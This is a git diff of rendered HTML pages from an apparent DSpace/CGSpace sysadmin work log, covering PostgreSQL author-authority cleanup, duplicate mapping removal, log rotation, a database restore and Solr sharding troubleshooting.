update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
</code></pre><h2 id="2016-12-08">2016-12-08</h2>
<ul>
<li>Something weird happened and Peter Thorne&rsquo;s names all ended up as &ldquo;Thorne&rdquo;, I guess because the original authority had that as its name value:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne%&#39;;
text_value | authority | confidence
------------------+--------------------------------------+------------
Thorne, P.J. | 18349f29-61b1-44d7-ac60-89e55546e812 | 600
@ -484,12 +484,12 @@ update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-417
</code></pre><ul>
<li>I generated a new UUID using <code>uuidgen | tr [A-Z] [a-z]</code> and set it along with correct name variation for all records:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b2f7603d-2fb5-4018-923a-c4ec8d85b3bb&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;;
UPDATE 43
</code></pre><ul>
<li>Apparently we also need to normalize Phil Thornton&rsquo;s names to <code>Thornton, Philip K.</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
text_value | authority | confidence
---------------------+--------------------------------------+------------
Thornton, P | 0d8369bb-57f7-4b2f-92aa-af820b183aca | 600
@ -506,7 +506,7 @@ UPDATE 43
</code></pre><ul>
<li>Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
UPDATE 362
</code></pre><ul>
<li>It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)</li>
@ -520,8 +520,8 @@ UPDATE 362
<li>Set PostgreSQL&rsquo;s <code>shared_buffers</code> on CGSpace to 10% of system RAM (1200MB)</li>
<li>Run the following author corrections on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;34df639a-42d8-4867-a3f2-1892075fcb3f&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39; or authority=&#39;021cd183-946b-42bb-964e-522ebff02993&#39;;
dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
</code></pre><ul>
<li>The authority IDs were different now than when I was looking a few days ago so I had to adjust them here</li>
</ul>
@ -542,7 +542,7 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
<li>Removing the duplicates in OpenRefine and uploading a CSV to DSpace says &ldquo;no changes detected&rdquo;</li>
<li>Seems like the only way to sortof clean these up would be to start in SQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Center for Tropical Agriculture&#39;;
text_value | authority | confidence
-----------------------------------------------+--------------------------------------+------------
International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 | -1
@ -554,9 +554,9 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 600
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | -1
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 0
dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
UPDATE 1693
dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, text_value=&#39;International Center for Tropical Agriculture&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%CIAT%&#39;;
UPDATE 35
</code></pre><ul>
<li>Work on article for KM4Dev journal</li>
@ -577,14 +577,14 @@ UPDATE 35
<li>So basically, new cron jobs for logs should look something like this:</li>
<li>Find any file named <code>*.log*</code> that isn&rsquo;t <code>dspace.log*</code>, isn&rsquo;t already zipped, and is older than one day, and zip it:</li>
</ul>
<pre tabindex="0"><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &quot;.*\.log.*&quot; ! -iregex &quot;.*dspace\.log.*&quot; ! -iregex &quot;.*\.(gz|lrz|lzo|xz)&quot; ! -newermt &quot;Yesterday&quot; -exec schedtool -B -e ionice -c2 -n7 xz {} \;
<pre tabindex="0"><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &#34;.*\.log.*&#34; ! -iregex &#34;.*dspace\.log.*&#34; ! -iregex &#34;.*\.(gz|lrz|lzo|xz)&#34; ! -newermt &#34;Yesterday&#34; -exec schedtool -B -e ionice -c2 -n7 xz {} \;
</code></pre><ul>
<li>Since there is <code>xzgrep</code> and <code>xzless</code> we can actually just zip them after one day, why not?!</li>
<li>We can keep the zipped ones for two weeks just in case we need to look for errors, etc, and delete them after that</li>
<li>I use <code>schedtool -B</code> and <code>ionice -c2 -n7</code> to set the CPU scheduling to <code>SCHED_BATCH</code> and the IO to best effort which should, in theory, impact important system processes like Tomcat and PostgreSQL less</li>
<li>When the tasks are running you can see that the policies do apply:</li>
</ul>
<pre tabindex="0"><code>$ schedtool $(ps aux | grep &quot;xz /home&quot; | grep -v grep | awk '{print $2}') &amp;&amp; ionice -p $(ps aux | grep &quot;xz /home&quot; | grep -v grep | awk '{print $2}')
<pre tabindex="0"><code>$ schedtool $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;) &amp;&amp; ionice -p $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;)
PID 17049: PRIO 0, POLICY B: SCHED_BATCH , NICE 0, AFFINITY 0xf
best-effort: prio 7
</code></pre><ul>
@ -679,11 +679,11 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
<li>None of our users in African institutes will have IPv6, but some Europeans might, so I need to check if any submissions have been added since then</li>
<li>Update some names and authorities in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='5ff35043-942e-4d0a-b377-4daed6e3c1a3', confidence=600, text_value='Duncan, Alan' where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*Duncan,? A.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;5ff35043-942e-4d0a-b377-4daed6e3c1a3&#39;, confidence=600, text_value=&#39;Duncan, Alan&#39; where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*Duncan,? A.*&#39;;
UPDATE 204
dspace=# update metadatavalue set authority='46804b53-ea30-4a85-9ccf-b79a35816fa9', confidence=600, text_value='Mekonnen, Kindu' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Mekonnen, K%';
dspace=# update metadatavalue set authority=&#39;46804b53-ea30-4a85-9ccf-b79a35816fa9&#39;, confidence=600, text_value=&#39;Mekonnen, Kindu&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Mekonnen, K%&#39;;
UPDATE 89
dspace=# update metadatavalue set authority='f840da02-26e7-4a74-b7ba-3e2b723f3684', confidence=600, text_value='Lukuyu, Ben A.' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Lukuyu, B%';
dspace=# update metadatavalue set authority=&#39;f840da02-26e7-4a74-b7ba-3e2b723f3684&#39;, confidence=600, text_value=&#39;Lukuyu, Ben A.&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Lukuyu, B%&#39;;
UPDATE 140
</code></pre><ul>
<li>Generated a new UUID for Ben using <code>uuidgen | tr [A-Z] [a-z]</code> as the one in Solr had his ORCID but the name format was incorrect</li>
@ -716,9 +716,9 @@ OCSP Response Data:
# su - postgres
$ dropdb cgspace
$ createdb -O cgspace --encoding=UNICODE cgspace
$ psql cgspace -c 'alter user cgspace createuser;'
$ psql cgspace -c &#39;alter user cgspace createuser;&#39;
$ pg_restore -O -U cgspace -d cgspace -W -h localhost /home/backup/postgres/cgspace_2016-12-18.backup
$ psql cgspace -c 'alter user cgspace nocreateuser;'
$ psql cgspace -c &#39;alter user cgspace nocreateuser;&#39;
$ psql -U cgspace -f ~tomcat7/src/git/DSpace/dspace/etc/postgres/update-sequences.sql cgspace -h localhost
$ vacuumdb cgspace
$ psql cgspace

View File

@ -28,7 +28,7 @@ I checked to see if the Solr sharding task that is supposed to run on January 1s
I tested on DSpace Test as well and it doesn&rsquo;t work there either
I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -124,7 +124,7 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
<ul>
<li>I tried to shard my local dev instance and it fails the same way:</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace stats-util -s
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace stats-util -s
Moving: 9318 into core statistics-2016
Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
@ -179,15 +179,15 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>Despite failing instantly, a <code>statistics-2016</code> directory was created, but it only has a data dir (no conf)</li>
<li>The Tomcat access logs show more:</li>
</ul>
<pre tabindex="0"><code>127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 107
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-17YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 423
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 77
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 63
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&quot; 200 4359517
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 16248
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 409 156
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &quot;POST /solr/datatables/update?wt=javabin&amp;version=2 HTTP/1.1&quot; 200 41
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &quot;POST /solr/datatables/update HTTP/1.1&quot; 200 40
<pre tabindex="0"><code>127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-17YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 423
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 77
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 4359517
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16248
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 409 156
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update?wt=javabin&amp;version=2 HTTP/1.1&#34; 200 41
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update HTTP/1.1&#34; 200 40
</code></pre><ul>
<li>Very interesting&hellip; it creates the core and then fails somehow</li>
</ul>
@ -208,11 +208,11 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>I found an old post on the mailing list discussing a similar issue, and listing some SQL commands that might help</li>
<li>For example, this shows 186 mappings for the item, the first three of which are real:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80596';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80596&#39;;
</code></pre><ul>
<li>Then I deleted the others:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
<pre tabindex="0"><code>dspace=# delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
</code></pre><ul>
<li>And in the item view it now shows the correct mappings</li>
<li>I will have to ask the DSpace people if this is a valid approach</li>
@ -224,19 +224,19 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>Error in <code>fix-metadata-values.py</code> when it tries to print the value for Entwicklung &amp; Ländlicher Raum:</li>
</ul>
<pre tabindex="0"><code>Traceback (most recent call last):
File &quot;./fix-metadata-values.py&quot;, line 80, in &lt;module&gt;
print(&quot;Fixing {} occurences of: {}&quot;.format(records_to_fix, record[0]))
UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15: ordinal not in range(128)
File &#34;./fix-metadata-values.py&#34;, line 80, in &lt;module&gt;
print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0]))
UnicodeEncodeError: &#39;ascii&#39; codec can&#39;t encode character u&#39;\xe4&#39; in position 15: ordinal not in range(128)
</code></pre><ul>
<li>Seems we need to encode as UTF-8 before printing to screen, ie:</li>
</ul>
<pre tabindex="0"><code>print(&quot;Fixing {} occurences of: {}&quot;.format(records_to_fix, record[0].encode('utf-8')))
<pre tabindex="0"><code>print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0].encode(&#39;utf-8&#39;)))
</code></pre><ul>
<li>See: <a href="http://stackoverflow.com/a/36427358/487333">http://stackoverflow.com/a/36427358/487333</a></li>
<li>I&rsquo;m actually not sure if we need to encode() the strings to UTF-8 before writing them to the database&hellip; I&rsquo;ve never had this issue before</li>
<li>Now back to cleaning up some journal titles so we can make the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now get the top 500 journal titles:</li>
</ul>
@ -255,9 +255,9 @@ UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15:
<li>Fix the two items Maria found with duplicate mappings with this script:</li>
</ul>
<pre tabindex="0"><code>/* 184 in correct mappings: https://cgspace.cgiar.org/handle/10568/78596 */
delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
/* 1 incorrect mapping: https://cgspace.cgiar.org/handle/10568/78658 */
delete from collection2item where id = '91082';
delete from collection2item where id = &#39;91082&#39;;
</code></pre><h2 id="2017-01-17">2017-01-17</h2>
<ul>
<li>Helping clean up some file names in the 232 CIAT records that Sisay worked on last week</li>
@ -266,15 +266,15 @@ delete from collection2item where id = '91082';
<li>And the file names don&rsquo;t really matter either, as long as the SAF Builder tool can read them—after that DSpace renames them with a hash in the assetstore</li>
<li>Seems like the only ones I should replace are the <code>'</code> apostrophe characters, as <code>%27</code>:</li>
</ul>
<pre tabindex="0"><code>value.replace(&quot;'&quot;,'%27')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;%27&#39;)
</code></pre><ul>
<li>Add the item&rsquo;s Type to the filename column as a hint to SAF Builder so it can set a more useful description field:</li>
</ul>
<pre tabindex="0"><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Test importing of the new CIAT records (actually there are 232, not 234):</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
</code></pre><ul>
